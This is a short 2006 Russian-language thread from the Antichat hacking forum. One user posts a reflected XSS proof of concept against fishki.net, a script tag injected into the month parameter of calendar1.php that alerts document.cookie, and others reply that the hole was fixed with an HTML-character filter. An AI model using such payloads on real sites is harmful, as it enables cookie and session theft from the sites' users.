Форум АНТИЧАТ - XSS на fishki.net.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - XSS на fishki.net. (https://forum.antichat.xyz/showthread.php?t=21259)

1ten0.0net1

03.07.2006 02:14

XSS на fishki.net.

Сам сайт я не юзаю, но у нас в локали он весьма популярен - часто сцыллы проскакивают. Нашел там XSS
http://fishki.net/calendar1.php?month=08-2006"><script>alert(document.cookie);</script>

podkashey

04.07.2006 19:30

Или нету КСС, или уже исправили.
Если все таки она там есть, то лучше перенесите тему вот сюда: https://forum.antichat.ru/thread16507-*fishki*.html

max_pain89

04.07.2006 19:41

все, уязвимость исправлена, поставили фильт по спец. знакам хтмыла... странно, лучше бы они через preg_match организовали образцы...

Время: 17:37